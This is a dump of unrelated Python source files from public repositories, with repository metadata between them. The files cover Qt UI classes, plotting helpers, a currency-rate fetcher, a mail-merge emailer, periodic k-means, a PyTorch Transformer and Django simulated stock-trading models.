class MenuBar(QtWidgets.QMenuBar):
def __init__(self, parent=None):
super().__init__(parent)
self.actionConfig = QtWidgets.QAction("Config Tense and Mood")
self.actionPref = QtWidgets.QAction('Preference')
self.actionAddVoc = QtWidgets.QAction("Add Vocabulary")
self.actionAddVoc.setShortcut('Ctrl+N')
self.actionBrowse = QtWidgets.QAction("Browse Glossary")
self.actionStats = QtWidgets.QAction('Statistics')
self.menuConfig = self.addMenu("&Config")
self.menuConfig.addAction(self.actionConfig)
self.menuConfig.addAction(self.actionPref)
self.menuGloss = self.addMenu("&Glossary")
self.menuGloss.addAction(self.actionAddVoc)
self.menuGloss.addAction(self.actionBrowse)
self.menuStats = self.addMenu("&Statistics")
self.menuStats.addAction(self.actionStats)
def apply_lang(self, lang_pkg):
self.actionConfig.setText(lang_pkg['action_config'])
self.actionPref.setText(lang_pkg['action_pref'])
self.actionAddVoc.setText(lang_pkg['action_addvoc'])
self.actionBrowse.setText(lang_pkg['action_browse'])
self.actionStats.setText(lang_pkg['action_stats'])
self.menuConfig.setTitle(lang_pkg['menu_config'])
self.menuGloss.setTitle(lang_pkg['menu_glossary'])
self.menuStats.setTitle(lang_pkg['menu_stats'])
class StatusBar(QtWidgets.QStatusBar):
def __init__(self, config, parent=None):
super().__init__(parent)
self.config = config
self.labelN1 = QtWidgets.QLabel()
self.labelN2 = QtWidgets.QLabel()
self.addPermanentWidget(self.labelN1)
self.addPermanentWidget(self.labelN2)
def refresh(self, n1, n2):
self.labelN1.setText(LANG_PKG[self.config.lang]['status_msg1'].format(n1))
self.labelN2.setText(LANG_PKG[self.config.lang]['status_msg2'].format(n2))
def launch():
app = QtWidgets.QApplication(sys.argv)
window = MainWindow()
window.show()
sys.exit(app.exec_())
if __name__ == '__main__':
launch()
# --- python/lib/viewer/bluf/plot_func.py (timtyree/bgmc) ---
import matplotlib.pyplot as plt, numpy as np, pandas as pd
# general functions for plotting
# Tim Tyree
# 7.23.2021
def PlotTextBox(ax,text,text_width=150.,xcenter=0.5,ycenter=0.5,fontsize=20, family='serif', style='italic',horizontalalignment='center',
verticalalignment='center', color='black',use_turnoff_axis=True,**kwargs):
    # Pass the family/style/color arguments through instead of hard-coding them
    txt = ax.text(xcenter, ycenter, text, horizontalalignment=horizontalalignment,
                  verticalalignment=verticalalignment, transform=ax.transAxes,
                  fontsize=fontsize, family=family, style=style, color=color, wrap=True, **kwargs)
txt._get_wrap_line_width = lambda : text_width
if use_turnoff_axis:
ax.axis('off')
def text_plotter_function(ax,data):
text=data
# ax.text(0.5, 0.5, text, family='serif', style='italic', ha='right', wrap=True)
PlotTextBox(ax,text,fontsize=10)
return True
def format_plot_general(**kwargs):
return format_plot(**kwargs)
def format_plot(ax=None,xlabel=None,ylabel=None,fontsize=20,use_loglog=False,xlim=None,ylim=None,use_bigticks=True,**kwargs):
    '''Apply routine formatting to the matplotlib axes instance ax:
    label the x axis with the string xlabel, label the y axis with the
    string ylabel, and optionally set log scales, axis limits and
    enlarged tick labels.
    '''
if not ax:
ax=plt.gca()
if use_loglog:
ax.set_xscale('log')
ax.set_yscale('log')
if xlabel:
ax.set_xlabel(xlabel,fontsize=fontsize,**kwargs)
if ylabel:
ax.set_ylabel(ylabel,fontsize=fontsize,**kwargs)
if use_bigticks:
ax.tick_params(axis='both', which='major', labelsize=fontsize,**kwargs)
ax.tick_params(axis='both', which='minor', labelsize=0,**kwargs)
if xlim:
ax.set_xlim(xlim)
    if ylim:
        ax.set_ylim(ylim)
return True
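# Example usage (hypothetical data):
#   fig, ax = plt.subplots()
#   ax.plot([1, 10, 100], [3, 30, 300])
#   format_plot(ax=ax, xlabel='x', ylabel='y', use_loglog=True)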
def FormatAxes(ax,x1label,x2label,title=None,x1lim=None,x2lim=None,fontsize=16,use_loglog=False,**kwargs):
if x1lim is not None:
ax.set_xlim(x1lim)
if x2lim is not None:
ax.set_ylim(x2lim)
if title is not None:
ax.set_title(title,fontsize=fontsize)
format_plot(ax, x1label, x2label, fontsize=fontsize, use_loglog=use_loglog,**kwargs)
return True
def plot_horizontal(ax,xlim,x0,Delta_thresh=1.,use_Delta_thresh=False):
#plot the solid y=0 line
x=np.linspace(xlim[0],xlim[1],10)
ax.plot(x,0*x+x0,'k-')
if use_Delta_thresh:
#plot the dotted +-Delta_thresh lines
ax.plot(x,0*x+Delta_thresh+x0,'k--',alpha=0.7)
ax.plot(x,0*x-Delta_thresh+x0,'k--',alpha=0.7)
return True
# --- box/endpoints.py (manojiitkumar93/apibox) ---
from lambdatest import Operations
from unicode1 import convert
file_name = "ocr.json"
k = Operations()
jsonObj = k.load_Json(file_name)
dictData = convert(jsonObj)
endpoints_list = dictData["endpoints"]
enp_path = []
dfp = {}
for i in endpoints_list:
enp_path.append(i["path"])
    try:
        dfp[i["path"]] = i['result']
    except KeyError:
        # Some endpoints have no 'result' entry; skip them
        pass
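# Assumed shape of ocr.json (inferred from the code above):
#   {"endpoints": [{"path": "...", "result": ...}, ...]}
# enp_path collects every endpoint path; dfp maps path -> result where one exists.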
# --- src/currency_rates.py (akinmetin/currency-rates) ---
import requests
from decouple import config
import datetime
from calendar import monthrange
import psycopg2
import time
def create_db_table():
con = psycopg2.connect(database=config("DB_NAME"), user=config("DB_USER"),
password=config("DB_PASSWORD"),
host=config("DB_HOST"), port=config("DB_PORT"))
cur = con.cursor()
cur.execute('''CREATE TABLE rates
(DATE VARCHAR(10) NOT NULL,
CURRENCY VARCHAR(3) NOT NULL,
VALUE FLOAT NOT NULL);''')
con.commit()
con.close()
def first_run():
# first create a table in the database
create_db_table()
currentDT = datetime.datetime.now()
year = currentDT.year
month = currentDT.month
# find the previous month's number. If current month is the first month,
# then go to December of the previous year.
    if month != 1:
        month -= 1
    else:
        month = 12
        year -= 1
# get total number of days in target month.
total_days = monthrange(year, month)[1]
# create database connection
con = psycopg2.connect(database=config("DB_NAME"), user=config("DB_USER"),
password=config("DB_PASSWORD"),
host=config("DB_HOST"), port=config("DB_PORT"))
cur = con.cursor()
# get entire month's data.
# http://data.fixer.io/api/YYYY-MM-DD?access_key=.....
for x in range(1, total_days + 1):
date = "{}/{}/{}".format(x, month, year)
url = "http://data.fixer.io/api/%s-%s-%s?access_key=%s" % \
(year, str(month).zfill(2), str(x).zfill(2), str(config("API_KEY")))
print(url)
response = requests.get(url)
data = response.json()["rates"]
for attr in data.keys():
cur.execute("INSERT INTO rates (DATE,CURRENCY,VALUE) \
VALUES (%s, %s, %s)", (date, str(attr), data[attr]))
# commit the waiting insert queries and close the connection.
con.commit()
con.close()
insert_into_db()
def check_db_table_exists():
con = psycopg2.connect(database=config("DB_NAME"), user=config("DB_USER"),
password=config("DB_PASSWORD"),
host=config("DB_HOST"), port=config("DB_PORT"))
cur = con.cursor()
cur.execute("select * from information_schema.tables where table_name=%s", ('rates',))
if bool(cur.rowcount):
con.close()
else:
con.close()
first_run()
def insert_into_db():
# get current date
currentDT = datetime.datetime.now()
year = currentDT.year
month = currentDT.month
day = currentDT.day
date = "{}/{}/{}".format(day, month, year)
# create database connection
con = psycopg2.connect(database=config("DB_NAME"), user=config("DB_USER"),
password=config("DB_PASSWORD"),
host=config("DB_HOST"), port=config("DB_PORT"))
cur = con.cursor()
# get currency json data from the api server
response = requests.get(config("API_ENDPOINT"))
data = response.json()["rates"]
for item in data.keys():
cur.execute("INSERT INTO rates (DATE,CURRENCY,VALUE) \
VALUES (%s, %s, %s)", (date, item, data[item]))
# commit the waiting insert queries and close the connection.
con.commit()
con.close()
def get_remaining_time():
currentDT = datetime.datetime.now()
hours = currentDT.hour
minutes = currentDT.minute
seconds = currentDT.second
    # remaining seconds until the next midnight
    remain = (23 - hours)*3600 + (59 - minutes)*60 + (60 - seconds)
return remain
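# Example: at 22:30:15, get_remaining_time() returns
#   (23 - 22)*3600 + (59 - 30)*60 + (60 - 15) = 5385 seconds until midnight.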
if __name__ == "__main__":
    # check the db table; if it doesn't exist, create it and pull last month's data into the db.
    check_db_table_exists()
    # endless loop: sleep until the next day begins, then run again
while True:
remain = get_remaining_time()
print("Sleeping: " + str(remain))
time.sleep(remain)
# run daily api request and insert fresh data into db.
insert_into_db()
# https://fixer.io/quickstart
# https://fixer.io/documentation
# https://www.dataquest.io/blog/python-api-tutorial/
# python get time --> https://tecadmin.net/get-current-date-time-python/
# python postgresql --> https://stackabuse.com/working-with-postgresql-in-python/
# check table if exists --> https://stackoverflow.com/questions/1874113/checking-if-a-postgresql-table-exists-under-python-and-probably-psycopg2
# postgres data types (postgres float) --> https://www.postgresqltutorial.com/postgresql-data-types/
# python get number of days in month --> https://stackoverflow.com/questions/4938429/how-do-we-determine-the-number-of-days-for-a-given-month-in-python
# --- association_rules_viz/graph.py (ScenesK/association-rules-viz) ---
import numpy as np
import pandas as pd
import networkx as nx
import matplotlib as mpl
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
def graph(lhs,
rhs,
support,
confidence,
lift,
data=None,
fig_scale=2,
font_size=None,
cmap=None):
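    """Draw one spring-layout digraph per unique antecedent (lhs) itemset.

    Node size encodes support, node colour encodes lift and edge width
    encodes confidence; a shared colorbar for lift is drawn once per grid row.
    """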
if data is None:
data = pd.DataFrame(
dict(
lhs=lhs,
rhs=rhs,
support=support,
confidence=confidence,
lift=lift))
lhs = 'lhs'
rhs = 'rhs'
support = 'support'
confidence = 'confidence'
lift = 'lift'
centers = data[lhs].unique()
graphs = centers.size
rows = np.ceil(np.sqrt(graphs)).astype(int)
cols = np.ceil(graphs / rows).astype(int)
fig, axes = plt.subplots(
rows, cols, figsize=(cols * fig_scale, rows * fig_scale))
data.loc[:, support] = data[support] / data[support].max() * 500
pc = None
for i, ((row, col), ax) in enumerate(np.ndenumerate(axes)):
ax.axis('off')
if col == cols - 1:
divider = make_axes_locatable(ax)
width = 0.25
cax = divider.append_axes("right", size=width, pad=0.25)
cbar = fig.colorbar(pc, cax=cax)
cbar.set_label('lift', size=font_size)
cbar.ax.tick_params(labelsize=font_size)
if i >= graphs:
continue
center = centers[i]
g = nx.DiGraph()
g.add_node(center, label=', '.join(center), size=0, color=0)
for node in data.loc[data[lhs] == center, rhs]:
name = (center, node)
index = data.index[(data[lhs] == center) & (data[rhs] == node)]
g.add_node(
name,
label=', '.join(node),
size=data.loc[index, support].values[0],
                color=data.loc[index, lift].values[0])
g.add_edge(
center, name, weight=data.loc[index, confidence].values[0])
pos = nx.spring_layout(g)
pos[center] = np.zeros(2)
nodelist = g.nodes
sizes = nx.get_node_attributes(g, 'size')
node_size = [sizes[key] for key in nodelist]
colors = nx.get_node_attributes(g, 'color')
node_color = [colors[key] for key in nodelist]
vmax = np.abs(data[lift]).max()
vmin = -vmax
pc = nx.draw_networkx_nodes(
g,
pos,
node_size=node_size,
node_color=node_color,
cmap=cmap,
vmin=vmin,
vmax=vmax,
ax=ax)
labels = nx.get_node_attributes(g, 'label')
nx.draw_networkx_labels(g, pos, labels, font_size=font_size, ax=ax)
edgelist = g.edges
weights = nx.get_edge_attributes(g, 'weight')
edge_width = np.array([weights[key] for key in edgelist
]) / data[confidence].max() * 3
nx.draw_networkx_edges(g, pos, width=edge_width, alpha=0.5, ax=ax)
xlim = ax.get_xlim()
ylim = ax.get_ylim()
ax.set(
xlim=[-np.abs(xlim).max(), np.abs(xlim).max()],
ylim=[-np.abs(ylim).max(), np.abs(ylim).max()])
pc.set(clip_on=False)
for child in ax.get_children():
if isinstance(child, mpl.text.Text):
child.set(clip_on=False)
plt.show()
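# Minimal usage sketch (added; the rules are illustrative). At least three
# distinct antecedents are used so that plt.subplots returns the 2-D axes
# grid that np.ndenumerate above expects.
# graph(lhs=[('bread',), ('milk',), ('eggs',)],
#       rhs=[('butter',), ('cereal',), ('bacon',)],
#       support=[0.30, 0.20, 0.25],
#       confidence=[0.80, 0.50, 0.60],
#       lift=[1.40, 0.90, 1.10],
#       font_size=8)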
| 34.46 | 75 | 0.531631 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 91 | 0.026407 |
9ead611c9befd61012037395d04c055fa2feabec | 1,833 | py | Python | src/herald/herald.py | Artic42/ArticUtils | 4eb3d010e2448d12edde569b600e6cd0d8f1d7a5 | [
"MIT"
]
| null | null | null | src/herald/herald.py | Artic42/ArticUtils | 4eb3d010e2448d12edde569b600e6cd0d8f1d7a5 | [
"MIT"
]
| null | null | null | src/herald/herald.py | Artic42/ArticUtils | 4eb3d010e2448d12edde569b600e6cd0d8f1d7a5 | [
"MIT"
]
| null | null | null | import readExcel
import modifyFile
import os
import sys
import time
import sendEmail
def main (excelFilePath):
emailConfigPath = "/tmp/emailConfig"
emailFilePath = "/tmp/emails"
    os.system ("mkdir -p " + emailConfigPath)
    os.system ("mkdir -p " + emailFilePath)
#Read excel file
excel = readExcel.readExcelFile (excelFilePath)
#Get config values
server = readExcel.getValueCell(excel, 1, 2)
sender = readExcel.getValueCell(excel, 2, 2)
subject = readExcel.getValueCell(excel, 3, 2)
user = readExcel.getValueCell(excel, 4, 2)
passwd = input ("Give email password?")
sendEmail.createEmailConfig (emailConfigPath, server, user, passwd)
#Create a list of all variables to change in body
titleRow = readExcel.getRowValues(excel,6,6) [0] [2:]
#Create list of data for every email
recipients = readExcel.getRowValues (excel,7, None)
#For all items in list
#Make the changes to the body, and create .email
paths = []
for recipient in recipients:
bodyPath = "/tmp/body"
modifyFile.copyFile ('body.html', bodyPath)
variables = recipient[2:]
for i in range(len(variables)):
modifyFile.replaceString (bodyPath, titleRow[i], str(variables[i]))
#Create .email file
tmpPath = emailFilePath + "/" + recipient[1] + ".email"
sendEmail.createEmailFile (tmpPath, bodyPath, subject, sender, recipient[0])
#Put path on list
paths.append (tmpPath)
#For item in path send email and wait 6 seconds
for path in paths:
sendEmail.send (path, emailConfigPath)
print ("Email send!")
time.sleep (6)
return
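# Assumed workbook layout (inferred from the reads in main(); added as a note):
#   rows 1-4, column 2: SMTP server, sender address, subject and user name
#   row 6, columns 3+:  placeholder names that appear in body.html
#   rows 7+: column 1 = recipient address, column 2 = output file name,
#            columns 3+ = per-recipient values for the placeholders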
if __name__ == "__main__":
if len (sys.argv) < 2:
main ("HeraldConfig.xlsx")
else:
main (sys.argv [1]) | 29.095238 | 84 | 0.643208 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 420 | 0.229133 |
9eaf5189699bfaacfc0f73117848a3fc060f8088 | 2,314 | py | Python | cvpack/extras/clustering.py | alkasm/cvtools | 7d7aceddf18aca03ac77ccf8e0da7f71ef6674a3 | [
"MIT"
]
| 10 | 2018-09-22T14:05:42.000Z | 2020-11-30T07:12:18.000Z | cvpack/extras/clustering.py | alkasm/cvmod | 7d7aceddf18aca03ac77ccf8e0da7f71ef6674a3 | [
"MIT"
]
| 3 | 2019-02-22T20:54:53.000Z | 2021-04-15T17:56:44.000Z | cvpack/extras/clustering.py | alkasm/cvpack | 7d7aceddf18aca03ac77ccf8e0da7f71ef6674a3 | [
"MIT"
]
| 1 | 2019-04-01T18:35:46.000Z | 2019-04-01T18:35:46.000Z | # type: ignore
import cv2
import numpy as np
TWO_PI = 2 * np.pi
def kmeans_periodic(columns, intervals, data, *args, **kwargs):
"""Runs kmeans with periodicity in a subset of dimensions.
Transforms columns with periodicity on the specified intervals into two
columns with coordinates on the unit circle for kmeans. After running
through kmeans, the centers are transformed back to the range specified
by the intervals.
Arguments
---------
columns : sequence
Sequence of indexes specifying the columns that have periodic data
intervals : sequence of length-2 sequences
Sequence of (min, max) intervals, one interval per column
See help(cv2.kmeans) for all other arguments, which are passed through.
Returns
-------
See help(cv2.kmeans) for outputs, which are passed through; except centers,
which is modified so that it returns centers corresponding to the input
data, instead of the transformed data.
Raises
------
cv2.error
If len(columns) != len(intervals)
"""
# Check each periodic column has an associated interval
if len(columns) != len(intervals):
raise cv2.error("number of intervals must be equal to number of columns")
ndims = data.shape[1]
ys = []
# transform each periodic column into two columns with the x and y coordinate
# of the angles for kmeans; x coord at original column, ys are appended
for col, interval in zip(columns, intervals):
a, b = min(interval), max(interval)
width = b - a
data[:, col] = TWO_PI * (data[:, col] - a) / width % TWO_PI
ys.append(width * np.sin(data[:, col]))
data[:, col] = width * np.cos(data[:, col])
# append the ys to the end
ys = np.array(ys).transpose()
data = np.hstack((data, ys)).astype(np.float32)
# run kmeans
retval, bestLabels, centers = cv2.kmeans(data, *args, **kwargs)
# transform the centers back to range they came from
for i, (col, interval) in enumerate(zip(columns, intervals)):
a, b = min(interval), max(interval)
angles = np.arctan2(centers[:, ndims + i], centers[:, col]) % TWO_PI
centers[:, col] = a + (b - a) * angles / TWO_PI
centers = centers[:, :ndims]
return retval, bestLabels, centers
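# Hedged usage sketch (not part of the original module): cluster 2-D points
# whose second column is an angle in [0, 2*pi); arguments after `data` are
# passed straight through to cv2.kmeans.
# pts = np.random.rand(100, 2).astype(np.float32)
# pts[:, 1] *= TWO_PI
# criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 20, 1.0)
# _, labels, centers = kmeans_periodic([1], [(0, TWO_PI)], pts, 3, None,
#                                      criteria, 5, cv2.KMEANS_RANDOM_CENTERS)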
| 33.536232 | 81 | 0.653414 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,297 | 0.560501 |
9eb1d479f5b09c6f55397ec22af703577ef9ccc9 | 6,599 | py | Python | models/model.py | SeungoneKim/Transformer_implementation | a52bf552eb645fc9bfb812cc26842fc147d6c008 | [
"Apache-2.0"
]
| null | null | null | models/model.py | SeungoneKim/Transformer_implementation | a52bf552eb645fc9bfb812cc26842fc147d6c008 | [
"Apache-2.0"
]
| null | null | null | models/model.py | SeungoneKim/Transformer_implementation | a52bf552eb645fc9bfb812cc26842fc147d6c008 | [
"Apache-2.0"
]
| null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
from models.embedding import TokenEmbedding, PositionalEncoding, TransformerEmbedding
from models.attention import ScaledDotProductAttention, MultiHeadAttention, FeedForward
from models.layers import EncoderLayer, DecoderLayer
class Encoder(nn.Module):
def __init__(self, enc_vocab_size, src_max_len,
model_dim, key_dim, value_dim, hidden_dim,
num_head, num_layer, drop_prob, device):
super(Encoder,self).__init__()
self.embedding = TransformerEmbedding(enc_vocab_size, model_dim, src_max_len, drop_prob, device)
self.layers = nn.ModuleList([EncoderLayer(model_dim, key_dim, value_dim,
hidden_dim, num_head,
drop_prob) for _ in range(num_layer)])
def forward(self, tensor, src_mask):
input_emb = self.embedding(tensor)
encoder_output = input_emb
for layer in self.layers:
encoder_output = layer(encoder_output, src_mask)
return encoder_output
class Decoder(nn.Module):
def __init__(self, dec_vocab_size, tgt_max_len,
model_dim, key_dim, value_dim, hidden_dim,
num_head, num_layer, drop_prob, device):
super(Decoder,self).__init__()
self.embedding = TransformerEmbedding(dec_vocab_size, model_dim, tgt_max_len, drop_prob, device)
self.layers = nn.ModuleList([DecoderLayer(model_dim, key_dim, value_dim,
hidden_dim, num_head,
drop_prob) for _ in range(num_layer)])
def forward(self, tensor, encoder_output, src_mask, tgt_mask):
tgt_emb = self.embedding(tensor)
decoder_output = tgt_emb
for layer in self.layers:
decoder_output = layer(decoder_output, encoder_output, src_mask, tgt_mask)
return decoder_output
class LanguageModelingHead(nn.Module):
def __init__(self, model_dim, dec_vocab_size):
        super(LanguageModelingHead, self).__init__()
self.linearlayer = nn.Linear(model_dim, dec_vocab_size)
def forward(self, decoder_output):
return self.linearlayer(decoder_output)
class TransformersModel(nn.Module):
def __init__(self, src_pad_idx, tgt_pad_idx,
enc_vocab_size, dec_vocab_size,
model_dim, key_dim, value_dim, hidden_dim,
num_head, num_layer, enc_max_len, dec_max_len, drop_prob, device):
super(TransformersModel, self).__init__()
self.src_pad_idx = src_pad_idx
self.tgt_pad_idx = tgt_pad_idx
self.device = device
self.Encoder = Encoder(enc_vocab_size, enc_max_len,
model_dim, key_dim, value_dim, hidden_dim, num_head, num_layer, drop_prob, device)
self.Decoder = Decoder(dec_vocab_size, dec_max_len,
model_dim, key_dim, value_dim, hidden_dim, num_head, num_layer, drop_prob, device)
        self.LMHead = LanguageModelingHead(model_dim, dec_vocab_size)
def forward(self, src_tensor, tgt_tensor):
enc_mask = self.generate_padding_mask(src_tensor, src_tensor, "src","src")
enc_dec_mask = self.generate_padding_mask(tgt_tensor, src_tensor, "src","tgt")
dec_mask = self.generate_padding_mask(tgt_tensor, tgt_tensor,"tgt","tgt") * \
self.generate_triangular_mask(tgt_tensor, tgt_tensor)
encoder_output = self.Encoder(src_tensor, enc_mask)
decoder_output = self.Decoder(tgt_tensor, encoder_output, enc_dec_mask, dec_mask)
output = self.LMHead(decoder_output)
return output
# applying mask(opt) : 0s are where we apply masking
# pad_type =["src". "tgt"]
def generate_padding_mask(self, query, key, query_pad_type=None, key_pad_type=None):
# query = (batch_size, query_length)
# key = (batch_size, key_length)
query_length = query.size(1)
key_length = key.size(1)
# decide query_pad_idx based on query_pad_type
if query_pad_type == "src":
query_pad_idx = self.src_pad_idx
elif query_pad_type == "tgt":
query_pad_idx = self.tgt_pad_idx
else:
assert "query_pad_type should be either src or tgt"
# decide key_pad_idx based on key_pad_type
if key_pad_type == "src":
key_pad_idx = self.src_pad_idx
elif key_pad_type == "tgt":
key_pad_idx = self.tgt_pad_idx
else:
assert "key_pad_type should be either src or tgt"
# convert query and key into 4-dimensional tensor
# query = (batch_size, 1, query_length, 1) -> (batch_size, 1, query_length, key_length)
query = query.ne(query_pad_idx).unsqueeze(1).unsqueeze(3)
query = query.repeat(1,1,1,key_length)
# key = (batch_size, 1, 1, key_length) -> (batch_size, 1, query_length, key_length)
key = key.ne(key_pad_idx).unsqueeze(1).unsqueeze(2)
key = key.repeat(1,1,query_length,1)
# create padding mask with key and query
mask = key & query
return mask
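    # Illustration (added): for a key batch [[5, 7, PAD]] the key-side mask row
    # is [True, True, False]; combined elementwise (&) with the query side it
    # blocks attention to padded positions.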
# applying mask(opt) : 0s are where we apply masking
def generate_triangular_mask(self, query, key):
# query = (batch_size, query_length)
# key = (batch_size, key_length)
query_length = query.size(1)
key_length = key.size(1)
# create triangular mask
mask = torch.tril(torch.ones(query_length,key_length)).type(torch.BoolTensor).to(self.device)
return mask
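    # Illustration (added): for a target length of 3 the triangular mask is
    #   [[1, 0, 0],
    #    [1, 1, 0],
    #    [1, 1, 1]]
    # (True on and below the diagonal), so multiplying it with the padding mask
    # in forward() blocks attention to future positions.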
def build_model(src_pad_idx, tgt_pad_idx,
enc_vocab_size, dec_vocab_size,
model_dim, key_dim, value_dim, hidden_dim,
num_head, num_layer, enc_max_len, dec_max_len, drop_prob):
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
model = TransformersModel(src_pad_idx, tgt_pad_idx,
enc_vocab_size, dec_vocab_size,
model_dim, key_dim, value_dim, hidden_dim,
num_head, num_layer, enc_max_len, dec_max_len, drop_prob,device)
return model.cuda() if torch.cuda.is_available() else model | 43.993333 | 105 | 0.618882 | 5,648 | 0.855887 | 0 | 0 | 0 | 0 | 0 | 0 | 800 | 0.12123 |
9eb2558837d9b3df4ed680f126f72ec0f1a601b9 | 23,299 | py | Python | market/models/sim_trades.py | LuoMaimingS/django_virtual_stock_market | cfeccdbb906f9998ec0a0633c2d2f39cdd87bf85 | [
"BSD-3-Clause"
]
| 1 | 2021-05-29T23:33:41.000Z | 2021-05-29T23:33:41.000Z | market/models/sim_trades.py | LuoMaimingS/django_virtual_stock_market | cfeccdbb906f9998ec0a0633c2d2f39cdd87bf85 | [
"BSD-3-Clause"
]
| null | null | null | market/models/sim_trades.py | LuoMaimingS/django_virtual_stock_market | cfeccdbb906f9998ec0a0633c2d2f39cdd87bf85 | [
"BSD-3-Clause"
]
| null | null | null | # _*_ coding:UTF-8 _*_
"""
This file defines the models for trading actions in the simulated environment.
It is not the original virtual-stock-market model: some adaptations were made and all foreign keys were removed.
"""
from django.db import models
import uuid
from decimal import Decimal
import time
from .clients import BaseClient
from .sim_market import SimMarket
from .sim_clients import SimHoldingElem, SimCommissionElem, SimTransactionElem
from .sim_stocks import SimStock, SimOrderBookEntry, SimOrderBookElem
from .config import *
class SimTradeMsg(models.Model):
stock_symbol = models.CharField(max_length=12)
    initiator = models.IntegerField(verbose_name='ID of the trade initiator')
trade_direction = models.CharField(max_length=1)
trade_price = models.DecimalField(max_digits=MAX_DIGITS, decimal_places=DECIMAL_PLACES)
trade_vol = models.IntegerField()
trade_date = models.DateTimeField(blank=False)
trade_tick = models.IntegerField(blank=False)
    # ID of the commission (resting order) traded against
    commission_id = models.UUIDField(blank=False, default=uuid.uuid4, verbose_name='UUID of the original commission')
    acceptor = models.IntegerField(verbose_name='ID of the trade acceptor')
tax_charged = models.FloatField(default=0)
def sim_instant_trade(msg):
"""
    The client's commission is traded immediately, so it never appears in the commission records.
    :param msg: information about the trade, a TradeMsg instance
"""
initiator = msg.initiator
stock_symbol = msg.stock_symbol
initiator_object = BaseClient.objects.get(id=initiator)
stock_object = SimStock.objects.get(symbol=stock_symbol)
SimTransactionElem.objects.create(one_side=initiator, the_other_side=msg.acceptor,
stock_symbol=stock_symbol, price_traded=msg.trade_price, vol_traded=msg.trade_vol,
date_traded=msg.trade_date, operation=msg.trade_direction)
if msg.trade_direction == 'a':
        # sell
hold_element = SimHoldingElem.objects.get(owner=initiator, stock_symbol=stock_symbol)
available_shares = hold_element.available_vol
assert available_shares >= msg.trade_vol
hold_element.available_vol -= msg.trade_vol
hold_element.vol -= msg.trade_vol
if hold_element.vol == 0:
            # all shares have now been sold; the position is gone, so delete this row
hold_element.delete()
else:
hold_element.save(update_fields=['vol', 'available_vol'])
earning = float(msg.trade_price * msg.trade_vol - msg.tax_charged)
initiator_object.cash += earning
initiator_object.flexible_cash += earning
elif msg.trade_direction == 'b':
        # buy
holding = SimHoldingElem.objects.filter(owner=initiator, stock_symbol=stock_symbol)
if holding.exists():
            # the stock is already held
assert holding.count() == 1
new_holding = holding[0]
new_holding.cost = Decimal((new_holding.cost * new_holding.vol + msg.trade_price * msg.trade_vol) /
(new_holding.vol + msg.trade_vol))
new_holding.price_guaranteed = new_holding.cost
new_holding.last_price = stock_object.last_price
new_holding.vol += msg.trade_vol
new_holding.available_vol += msg.trade_vol
new_holding.profit -= msg.tax_charged
new_holding.value = float(stock_object.last_price) * new_holding.vol
new_holding.save()
else:
            # buying a stock that was not held before
SimHoldingElem.objects.create(owner=initiator, stock_symbol=stock_symbol,
vol=msg.trade_vol, frozen_vol=0, available_vol=msg.trade_vol,
cost=msg.trade_price, price_guaranteed=msg.trade_price,
last_price=stock_object.last_price, profit=- msg.tax_charged,
value=stock_object.last_price * msg.trade_vol, date_bought=msg.trade_date)
spending = float(msg.trade_price * msg.trade_vol + msg.tax_charged)
initiator_object.cash -= spending
initiator_object.flexible_cash -= spending
initiator_object.save(update_fields=['cash', 'flexible_cash'])
return True
def sim_delayed_trade(msg):
"""
    A commission in the client's commission records gets traded, so the commission record is updated.
    :param msg: information about the trade, a TradeMsg instance
"""
assert isinstance(msg, SimTradeMsg)
acceptor = msg.acceptor
stock_symbol = msg.stock_symbol
if msg.trade_direction == 'a':
acceptor_direction = 'b'
else:
acceptor_direction = 'a'
acceptor_object = BaseClient.objects.get(id=acceptor)
stock_object = SimStock.objects.get(symbol=stock_symbol)
    # update the commission record first
commission_element = SimCommissionElem.objects.get(unique_id=msg.commission_id)
assert commission_element.stock_symbol == stock_symbol
assert commission_element.operation == acceptor_direction
assert commission_element.vol_traded + msg.trade_vol <= commission_element.vol_committed
new_avg_price = (commission_element.price_traded * commission_element.vol_traded +
msg.trade_price * msg.trade_vol) / (commission_element.vol_traded + msg.trade_vol)
commission_element.price_traded = new_avg_price
commission_element.vol_traded += msg.trade_vol
    # a completed commission is simply deleted for now: there is no commission history, only the transaction history
if commission_element.vol_traded == commission_element.vol_committed:
commission_element.delete()
else:
commission_element.save(update_fields=['price_traded', 'vol_traded'])
if acceptor_direction == 'a':
        # sell: update the holding
hold_element = SimHoldingElem.objects.get(owner=acceptor, stock_symbol=stock_symbol)
frozen_shares = hold_element.frozen_vol
assert frozen_shares >= msg.trade_vol
hold_element.frozen_vol -= msg.trade_vol
hold_element.vol -= msg.trade_vol
if hold_element.vol == 0:
            # all shares of this holding have been sold; the position is gone, so delete this row
hold_element.delete()
else:
hold_element.save(update_fields=['vol', 'frozen_vol'])
        # settle the proceeds: the traded amount minus the tax charged
earning = float(msg.trade_price * msg.trade_vol - msg.tax_charged)
acceptor_object.cash += earning
acceptor_object.flexible_cash += earning
elif acceptor_direction == 'b':
        # buy: open or extend the position
holding = SimHoldingElem.objects.filter(owner=acceptor, stock_symbol=stock_symbol)
if holding.exists():
            # the stock is already held
assert holding.count() == 1
new_holding = holding[0]
new_holding.cost = Decimal((new_holding.cost * new_holding.vol + msg.trade_price * msg.trade_vol) /
(new_holding.vol + msg.trade_vol))
new_holding.price_guaranteed = new_holding.cost
new_holding.last_price = stock_object.last_price
new_holding.vol += msg.trade_vol
new_holding.available_vol += msg.trade_vol
new_holding.profit -= msg.tax_charged
new_holding.value = float(stock_object.last_price) * new_holding.vol
new_holding.save()
else:
            # buying a stock that was not held before
SimHoldingElem.objects.create(owner=acceptor, stock_symbol=stock_symbol,
vol=msg.trade_vol, frozen_vol=0, available_vol=msg.trade_vol,
cost=msg.trade_price, price_guaranteed=msg.trade_price,
last_price=stock_object.last_price, profit=- msg.tax_charged,
value=stock_object.last_price * msg.trade_vol, date_bought=msg.trade_date)
        # settle the trade cost: deduct it from the frozen cash and the cash balance
spending = float(msg.trade_price * msg.trade_vol + msg.tax_charged)
acceptor_object.cash -= spending
acceptor_object.frozen_cash -= spending
acceptor_object.save(update_fields=['cash', 'frozen_cash', 'flexible_cash'])
return True
class SimCommissionMsg(models.Model):
